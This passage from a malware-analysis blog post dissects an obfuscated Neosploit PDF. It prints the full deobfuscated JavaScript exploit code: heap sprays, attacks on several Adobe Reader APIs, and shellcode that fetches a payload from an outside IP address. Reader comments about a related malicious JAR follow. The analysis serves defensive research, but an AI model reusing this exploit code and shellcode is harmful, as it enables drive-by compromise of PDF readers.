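info_expr = "this.in" + z("%66%6f%2e%61%75%74") + "hor"
poxyunavse = "xyuznaet.re"

# Object 36
lkaa = poxyunavse + yhahahahahahavvvvvv + xyuvam + nenadoAVscaner

print(info_expr)
print(lkaa)
```

So the string handed to eval is xyuznaet.replace(/lka1/g,bolshayapizdavam), where xyuznaet is this.info.author: every "lka1" in the Author field becomes a "%", and Object 38 unescapes and evals the result.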

 

So, one of the odd things about this PDF is that there are several object names defined, but I don't see them used anywhere. (In short, you can rename objects from 123 0 R to something easier to remember, like /Bob.)

48 0 obj
<< /Names [(xyak) 31 0 R (fuckinshit) 33 0 R (komonogirsl) 35 0 R (komonogirsls) 37 0 R ]
>>
endobj

 

Also, Object #5 and Object #14 are empty. These are info.Title and info.Producer, respectively.

5 0 obj
<< 
/Filter /FlateDecode 
/Length 0 
>>
stream
endstream
endobj
14 0 obj
<< 
/Filter /FlateDecode 
/Length 0
>>
stream
endstream
endobj

 

51 0 R Decoded

 


function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34
%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B
%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324
%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B
%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455
%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF
%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F
%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u656E%u0077");var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e
%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273
%u4c51%u576d%u5772%u5670");while(block.length <= 32768) block+=block;block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC",
new Date());util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());try {this.media.newPlayer(null);} catch(e)
{}util.printd(GDagaCuyNfRSFzaSZLO, new Date());} function util_printf(){var payload=unescape("%uC033%u8B64%u3040
%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44
%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150
%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56
%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865
%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56
%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60
%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F%u2E64%u6870%u3F70%u7073
%u3D6C%u6470%u5F66%u6170%u6B63");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A"); var heapblock=nop+payload;
var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;
while(bigblock.length<spray){bigblock+=bigblock;} var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);} function collab_email(){
var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44
%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150
%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56
%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865
%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56
%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60
%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F%u2E64%u6870%u3F70%u7073
%u3D6C%u6470%u5F66%u6170%u6B63");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;
var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(
var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;} var overflow=unescape("%u0c0c%u0c0c");
while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%uC033%u8B64%u3040%u0C78
%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455
%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA
%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA
%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D
%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856
%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862
%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6170%u6B63");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);
var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(
var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;} var tUMhNbGw=unescape("%09");
while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
function PPPDDDFF(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');
var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));
if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){util_printf();}
if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){collab_email();}
if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){collab_geticon();} printd(); } PPPDDDFF();
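
The version checks in PPPDDDFF() are worth a second look, because && binds tighter than || in the first test. Here is a rough Python model of the dispatch. The function name exploits_for is hypothetical, the version is passed in as the string that toString() would produce, and a missing digit is treated as 0, which I believe matches how Javascript coerces the empty string from charAt() in these comparisons.

```python
import re

def exploits_for(viewer_version):
    """Return the names of the functions PPPDDDFF() would call, in order."""
    digits = re.sub(r"\D", "", viewer_version)
    d = [int(digits[i]) if i < len(digits) else 0 for i in range(3)]
    fired = []
    # (d0 == 8 && d1 == 0) || (d1 == 1 && d2 < 3): the second half ignores d0.
    if (d[0] == 8 and d[1] == 0) or (d[1] == 1 and d[2] < 3):
        fired.append("util_printf")
    if d[0] < 8 or (d[0] == 8 and d[1] < 2 and d[2] < 2):
        fired.append("collab_email")
    if d[0] < 9 or (d[0] == 9 and d[1] < 1):
        fired.append("collab_geticon")
    fired.append("printd")   # called unconditionally; wraps media.newPlayer
    return fired

for version in ("7", "8.12", "9.1"):
    print(version, exploits_for(version))
```

Under this model a 9.1 viewer still gets util_printf() thrown at it, simply because its second digit is 1, and every version gets printd().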

 


And these seem to be on this exact same topic:

http://isc.sans.org/diary.html?storyid=7906
http://www.inreverse.net/?p=549


¹ I'm not 100% certain that it is Neosploit doing this, as I'm only looking at this toolkit's output.
² Neosploit and Mebroot go together like peanut butter and chocolate.
³ It looks almost exactly like the simple example in Annex H of the PDF specification.
⁴ This is a bit of an oversimplification. I'm leaving out all the stuff about cross reference streams, and reconstructing a file if the xref table is damaged or missing.



Julia Wolf @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com

4 thoughts on “PDF Obfuscation using getAnnots()”

  1. Regarding neosploit, I received an ‘o’ type which did not deliver a pdf, but MIME application/octet-stream starting with a PK header and Main.class content. What is this and how does it get executed?

  2. Anything that starts with a “PK” header, and has a “main.class” in it is a Java archive (.JAR file). Without looking at your file, I’m going to make an educated guess that it’s probably CVE-2008-5353. However, all of the CVE-2008-5353 samples I’ve looked at so far (which is not a lot), don’t contain a “main.class”.
    In case my html links get stripped:
    http://en.wikipedia.org/wiki/JAR_%28file_format%29
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5353

  3. Ok, I’ve looked into this now… The JAR file that Neosploit is sending out is MD5:7ea387bc8e66cadc85748e4d9f809aaa, and at first glance, I’m not sure why… This is the Java Class in question:
    (Created at about 2009-11-24 16:39:08 )
    00000000 ca fe ba be 00 00 00 30 00 0e 0a 00 03 00 0b 07 |.......0........|
    00000010 00 0c 07 00 0d 01 00 06 3c 69 6e 69 74 3e 01 00 |.........init...| ; edited for lt, gt symbols
    00000020 03 28 29 56 01 00 04 43 6f 64 65 01 00 0f 4c 69 |.()V...Code...Li|
    00000030 6e 65 4e 75 6d 62 65 72 54 61 62 6c 65 01 00 04 |neNumberTable...|
    00000040 69 6e 69 74 01 00 0a 53 6f 75 72 63 65 46 69 6c |init...SourceFil|
    00000050 65 01 00 09 4d 61 69 6e 2e 6a 61 76 61 0c 00 04 |e...Main.java...|
    00000060 00 05 01 00 04 4d 61 69 6e 01 00 12 6a 61 76 61 |.....Main...java|
    00000070 2f 61 70 70 6c 65 74 2f 41 70 70 6c 65 74 00 21 |/applet/Applet.!|
    00000080 00 02 00 03 00 00 00 00 00 02 00 01 00 04 00 05 |................|
    00000090 00 01 00 06 00 00 00 1d 00 01 00 01 00 00 00 05 |................|
    000000a0 2a b7 00 01 b1 00 00 00 01 00 07 00 00 00 06 00 |*...............|
    000000b0 01 00 00 00 0c 00 01 00 08 00 05 00 01 00 06 00 |................|
    000000c0 00 00 19 00 00 00 01 00 00 00 01 b1 00 00 00 01 |................|
    000000d0 00 07 00 00 00 06 00 01 00 00 00 11 00 01 00 09 |................|
    000000e0 00 00 00 02 00 0a |......|
    000000e6
    [All HTML tags are stripped from these comments, so I can't wrap a set of pre/pre tags around this. It also strips out all greater-than signs and less-than signs, and any ampersand-name-semicolon codes.]
    Virus Total says zero A/V scanners detect it as malicious:
    http://www.virustotal.com/analisis/d0bfb359d71b2f80b7e0539a9682b6884a5c2a5c8dd209ce4b72e79295ef90c1-1267136274
    But there’s something kinda weird about it…
    $ hachoir-metadata Main.class
    [err!] [] Hachoir can’t extract metadata, but is able to parse: Main.class
    Anyway, I’ll do some more research on it.
